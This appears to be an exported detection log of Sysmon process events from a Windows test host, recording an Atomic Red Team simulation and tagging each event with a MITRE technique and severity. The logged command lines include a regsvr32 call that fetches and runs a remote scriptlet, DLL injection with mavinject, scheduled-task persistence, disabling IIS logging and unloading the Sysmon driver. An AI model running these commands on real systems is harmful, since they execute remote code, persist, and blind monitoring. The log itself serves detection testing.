"C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1," 1 5 4 1 0 0x8000000000000000 4037 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:44.010 747F3D96-D978-5D31-0000-0010442F3800 2832 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548024.026061,2019-07-19T18:53:44.026061+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4036 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:43.460 747F3D96-D977-5D31-0000-0010771B3800 1476 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1563548023.574378,2019-07-19T18:53:43.574378+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," 1 5 4 1 0 0x8000000000000000 4035 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:43.339 747F3D96-D977-5D31-0000-00100A0E3800 3848 C:\Windows\System32\calc.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Calculator Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\calc.exe" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 747F3D96-D976-5D31-0000-001093EA3700 2332 C:\Windows\System32\regsvr32.exe regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll)",1," 1 5 4 1 0 0x8000000000000000 4033 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:42.834 747F3D96-D976-5D31-0000-001093EA3700 2332 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-D976-5D31-0000-001041E83700 4444 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 4033 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:42.834 747F3D96-D976-5D31-0000-001093EA3700 2332 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-D976-5D31-0000-001041E83700 4444 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 4033 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:42.834 747F3D96-D976-5D31-0000-001093EA3700 2332 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-D976-5D31-0000-001041E83700 4444 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1," 1 5 4 1 0 0x8000000000000000 4032 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:42.803 747F3D96-D976-5D31-0000-001041E83700 4444 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1," 1 5 4 1 0 0x8000000000000000 4032 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:42.803 747F3D96-D976-5D31-0000-001041E83700 4444 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548022.815966,2019-07-19T18:53:42.815966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4031 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:42.384 747F3D96-D976-5D31-0000-0010D8D53700 6312 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548022.301844,2019-07-19T18:53:42.301844+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "arp -a" ),1," 1 5 4 1 0 0x8000000000000000 4029 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:42.259 747F3D96-D976-5D31-0000-0010DBCC3700 6292 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "arp -a" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548022.276408,2019-07-19T18:53:42.276408+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4028 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:42.051 747F3D96-D976-5D31-0000-00104AC63700 6412 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548266.828722,2019-07-19T18:57:46.828722+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4088 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:46.531 747F3D96-DA6A-5D31-0000-001025AD3E00 4552 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1563548266.608481,2019-07-19T18:57:46.608481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 ),1," 1 5 4 1 0 0x8000000000000000 4086 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Persistence - Scheduled Task Management 2019-07-19 14:57:46.443 747F3D96-DA6A-5D31-0000-0010C4A83E00 1408 C:\Windows\System32\schtasks.exe 10.0.17763.1 (WinBuild.160101.0800) Task Scheduler Configuration Tool Microsoft® Windows® Operating System Microsoft Corporation SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 747F3D96-DA6A-5D31-0000-001072A63E00 4276 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548266.459733,2019-07-19T18:57:46.459733+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" ),1," 1 5 4 1 0 0x8000000000000000 4085 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:46.411 747F3D96-DA6A-5D31-0000-001072A63E00 4276 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548266.422427,2019-07-19T18:57:46.422427+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4084 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:46.174 747F3D96-DA6A-5D31-0000-0010C09D3E00 3224 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548266.094355,2019-07-19T18:57:46.094355+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd" ),1," 1 5 4 1 0 0x8000000000000000 4082 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:46.051 747F3D96-DA6A-5D31-0000-0010B2953E00 5036 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548264.283188,2019-07-19T18:57:44.283188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4080 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:16.531 747F3D96-DA4C-5D31-0000-001077603D00 6172 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548236.552097,2019-07-19T18:57:16.552097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe ),1," 1 5 4 1 0 0x8000000000000000 4079 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:16.477 747F3D96-DA4C-5D31-0000-0010655D3D00 2596 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1179] Hooking detected,1563548236.496455,2019-07-19T18:57:16.496455+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\mavinject.exe ) through command line ( "C:\Windows\system32\mavinject.exe" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll ),1," 1 5 4 1 0 0x8000000000000000 4078 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:15.754 747F3D96-DA4B-5D31-0000-0010CB413D00 2604 C:\Windows\System32\mavinject.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft Application Virtualization Injector Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\mavinject.exe" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548235.776993,2019-07-19T18:57:15.776993+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4077 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:14.972 747F3D96-DA4A-5D31-0000-00107A2C3D00 2584 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548234.991615,2019-07-19T18:57:14.991615+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true" ),1," 1 5 4 1 0 0x8000000000000000 4076 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:14.928 747F3D96-DA4A-5D31-0000-00106C293D00 4056 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548234.944276,2019-07-19T18:57:14.944276+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4075 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:14.745 747F3D96-DA4A-5D31-0000-0010EE223D00 1012 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548234.758535,2019-07-19T18:57:14.758535+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv" ),1," 1 5 4 1 0 0x8000000000000000 4074 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:14.696 747F3D96-DA4A-5D31-0000-0010C21F3D00 3976 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] 